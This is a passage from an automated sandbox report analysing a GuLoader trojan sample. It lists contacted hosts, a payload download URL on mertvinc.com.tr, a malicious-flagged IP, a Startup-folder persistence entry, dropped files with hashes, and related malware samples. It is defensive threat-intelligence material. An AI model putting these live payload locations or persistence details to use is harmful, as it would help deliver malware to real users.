        C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll3%ReversingLabs
        C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe42%ReversingLabsWin32.Trojan.Guloader

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin0%Avira URL Cloudsafe
        http://crl.microv0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        mertvinc.com.tr
        		185.244.144.68
        		truefalse
          		high
          s-part-0035.t-0009.t-msedge.net
          		13.107.246.63
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.binfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://crl.micropowershell.exe, 0000000A.00000002.1823896104.00000000077D0000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.microsoftpowershell.exe, 00000005.00000002.1748126062.0000000008205000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1833557916.0000000008756000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 0000000A.00000002.1806582406.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.powershell.exe, 00000008.00000002.1785903689.0000000008A97000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorErroryVVZdG2NJX.exe, yVVZdG2NJX.exe.3.drfalse
                                          		high
                                          http://crl.microvpowershell.exe, 00000005.00000002.1745481577.00000000072F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameyVVZdG2NJX.exe, 00000003.00000002.2609686663.00000000345A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.244.144.68
                                              		mertvinc.com.trTurkey
                                              		199608BIRBIRTRfalse
                                              87.121.86.8
                                              		unknownBulgaria
                                              		34577SKATTV-ASBGtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1561885
                                              Start date and time:2024-11-24 16:36:09 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 59s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:yVVZdG2NJX.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:18ea5087eb82e075ca35d2b2dcff9450.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@12/21@1/2
                                              EGA Information:
                                              • Successful, ratio: 40%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 311
                                              • Number of non-executed functions: 76
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 1708 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 5900 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 656 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: yVVZdG2NJX.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:37:46API Interceptor30x Sleep call for process: powershell.exe modified
                                              10:37:59API Interceptor440953x Sleep call for process: yVVZdG2NJX.exe modified
                                              16:38:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnk

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              185.244.144.68WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • mertvinc.com.tr/fRzMqN204.bin
                                              MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                              • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                              CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                              • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                              TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                              • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                              Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
                                              Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
                                              7000091945.xlsx.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • mertvinc.com.tr/OGDTCbBRybqnXF193.bin
                                              87.121.86.8Payment Order #00004647.exeGet hashmaliciousXWormBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                mertvinc.com.trWC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 185.244.144.68
                                                Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                • 185.244.144.68
                                                Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                • 185.244.144.68
                                                s-part-0035.t-0009.t-msedge.netBestellung EB0072813.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 13.107.246.63
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 13.107.246.63
                                                file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                • 13.107.246.63
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 13.107.246.63
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                • 13.107.246.63
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 13.107.246.63
                                                registration.msiGet hashmaliciousAteraAgentBrowse
                                                • 13.107.246.63
                                                Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                                                • 13.107.246.63
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 13.107.246.63
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                • 13.107.246.63

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                BIRBIRTRWC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 185.244.144.68
                                                Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.244.144.68
                                                Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                • 185.244.144.68
                                                Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                • 185.244.144.68
                                                SKATTV-ASBGhttps://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                • 87.121.86.72
                                                http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                                                • 87.121.86.72
                                                [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.emlGet hashmaliciousUnknownBrowse
                                                • 87.121.86.72
                                                o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                                • 87.120.237.130
                                                Payment Order #00004647.exeGet hashmaliciousXWormBrowse
                                                • 87.121.86.8
                                                https://www.google.pl/url?url=http://msulrmrdjzsckgcdargfhi.com&nbq=tspwcyd&idbzok=wua&nbnak=ambmgo&lwf=vngmsem&q=amp/jdsra7r.ldn%C2%ADf%C2%ADpwlywydkjq%C2%ADuh%C2%ADf%C2%ADx%C2%AD.com/ufpd3kprb&xssr=zrcbvya&bhrswcv=abqvczic&clvu=wotwqzi&umasmoc=lhibfmio&tgek=sdcrupi&bpcjeel=qvmnlgnn&eign=czorcvw&txcfkja=lhtluzhk&zkmb=joyrkbk&mspp=frbfplx&ohrxtnn=emgsiphv&cbqf=eyyxrom&ngreupz=nzdjgaue&xtpz=fvqzpcq&spvwwuv=vijpphwi&wrjj=pklwpte&uuahvww=saaddjqzGet hashmaliciousUnknownBrowse
                                                • 87.121.86.72
                                                tfSYi9zABT.exeGet hashmaliciousQuasarBrowse
                                                • 87.121.86.32
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 94.156.116.236
                                                https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                • 87.121.86.72
                                                muAZlKU0hq.elfGet hashmaliciousMiraiBrowse
                                                • 87.120.53.129

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dllORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                      Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                        Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                          Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                            rTransferenciarealizada451236.exeGet hashmaliciousGuLoaderBrowse
                                                              rTransferenciarealizada451236.exeGet hashmaliciousGuLoaderBrowse
                                                                Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Sipunculoidea.ude

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-12, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 649037107316853453566312041152512.000000
                                                                    Category:dropped
                                                                    Size (bytes):286686
                                                                    Entropy (8bit):1.2536158727628404
                                                                    Encrypted:false
                                                                    SSDEEP:768:3zbnVKpXfwz53wppkaub35azZSECekyln9KUXjJrv5YQ1ujVNDYb3ezsIhWCUiSL:KH4hI9iE3sLB9pXYzlkOYFWf9
                                                                    MD5:99A5E2E2953D0374F1E23FF8B0B6773F
                                                                    SHA1:5FC3F9C3638DD60012AB2F2ECDD016912BBDB9F3
                                                                    SHA-256:3D1233CB89AD10CCC6972697279A3741F6031E05D32738E9B34D37A230C0F84A
                                                                    SHA-512:1B002C12EAB187B0246483C5F3B0758DC84BCC884E1120A17B0412DFD349972DB5DA04E154AE21D405BA33BBD0C29AADFA7D1BF4D50347146D6DFCCBBD8DA94A
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.........................................|.........................F........................................................S..............................S.................................................................8....;........................^........................)......"..Y........B................d......................}.........i......................................9.....................................R...............]............................................................I.........u..................................j.....^.....................................................................W..................................................................................m......................................*.....................>..........O........[................................................B............................}..../...............................[.......?.............................Z..#.........................4...............................

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Sobs.Led

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):472132
                                                                    Entropy (8bit):6.956351391553394
                                                                    Encrypted:false
                                                                    SSDEEP:6144:HVj1WHUoByvXRuu0P+kvEKo7LCM2yhNMu06zBeALFY9CIBtsAjA5LiXo:1jE0kyvXUu9JKeb2y7Q9CfAE5LT
                                                                    MD5:19EFFAFEA058EA49757155E12CFB70E0
                                                                    SHA1:8DFB7958DBCFC494B64DB93847D13FF442E0E124
                                                                    SHA-256:AF69D58C579FC312A5FF5C48567AD67F3E058DBDECE63D61F85712BEA671E0CE
                                                                    SHA-512:E2861474E49BAB0E4EEF83341973E35B2B8A6C03FADB6A9DE7A5798154783A5058EA6783BF1844B3599351DEDE6B0B17E3B27B17323119334C7369A33F72F8FD
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\moccasins.ved

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):73531
                                                                    Entropy (8bit):1.2569404898190384
                                                                    Encrypted:false
                                                                    SSDEEP:384:dVICOgr5CpPXeGASSCorJvHtPvpwqcQ+5pPZg71l4oLuZK52Oc410+RaL7VomsEa:dVcPX7U1R9mPZgx1hn32+emD40rd
                                                                    MD5:22148562A5A87FF1BECCAE5E77D87142
                                                                    SHA1:D1B04F09ACFC146855AA02A8C530AA8A45DF3F24
                                                                    SHA-256:B09EF713D0920E9671DA35332C6DAE7C1E12BE409A7077D6CA3E07938F9C08E9
                                                                    SHA-512:3F96B2ABED75C8EA941E45BB3835EF4D5FC92C5C5F829A738641FD398D88BB838E7C22A0F5F998BF387A5CE4ADC77EECAA049BCFB1A9ADD476871C871D58E811
                                                                    Malicious:false
                                                                    Preview:......................................................................................x..........................|........................................l...................a.........................................U.....................k..........................................G..................................................................|.....b....................O...R..........n...................&.....................l..................!.......6......... ......S.......................................}........................................7..................................................................................................................................................B......#......b....................60........?.....z.......>..........................:..............%..l...........g...........................=D.....{.....................................&........................{.......................i..........................................5.]............

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\sporostrote.dip

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):220203
                                                                    Entropy (8bit):1.262001836842358
                                                                    Encrypted:false
                                                                    SSDEEP:768:EBCX3JLNVpAeI+EgywY0Szqqv3ib1RuU7thllrhAKF3+O1jaJgMH8JHuHR6qTSIT:EkLjwqF1z1MoqyH
                                                                    MD5:F8A828CA56113806A25802FF2AF74282
                                                                    SHA1:B016C4258BD1F9A19989E0C6B7AB993ED02DF96F
                                                                    SHA-256:95941451FFB946693877FBD721001ACC32FE70D75EA68CAB1756B3ADF77DCFF4
                                                                    SHA-512:6725AA09040FAC962CCFF2EF9897FB6F3F3706FE60D8C55A69CB9E0C21362B3C8C186C573D647C0A50438686D6035361A4A20138C451E641D507BD1218D1E079
                                                                    Malicious:false
                                                                    Preview:...................................................@......................................................................<....................................................O....../..........T.....................................i................................................................,.......................t.....................t.................................{!...................................................................................................X..........s.............@.............C....2................................-..............................w..............................................................H....................I........."..................C.................a................p...6.......................'......................................................................................%.............................x.................Q...................................z..........................i....hv...x.................`..........c.

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):2232
                                                                    Entropy (8bit):5.379540626579189
                                                                    Encrypted:false
                                                                    SSDEEP:48:NlWSU4y4RFymFoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:NlLHyIFvKLgZ2KRHWLOugss
                                                                    MD5:11EABB3351BC466B48B7FF5E30F74994
                                                                    SHA1:AEEC7B7A907A23382CD1E5632F17B9E65B34F4A5
                                                                    SHA-256:9B6048D28C896229FC7B915763BBB51F03F05914B2A02D9B792305E2F8A714A9
                                                                    SHA-512:658F56F52525478CC627956DEDB5A669E581BFB62B94B7EDBB508565F1D3B12744EC942CBE6B4B4CD42D70275DD801566957DFE94210CFF5BA1CB1C9FEF089FE
                                                                    Malicious:false
                                                                    Preview:@...e.................................[..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):29
                                                                    Entropy (8bit):3.598349098128234
                                                                    Encrypted:false
                                                                    SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                    MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                    SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                    SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                    SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                    Malicious:false
                                                                    Preview:....### explorer ###..[WIN]r

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qeehnvl.xg0.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1amofv5w.z41.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
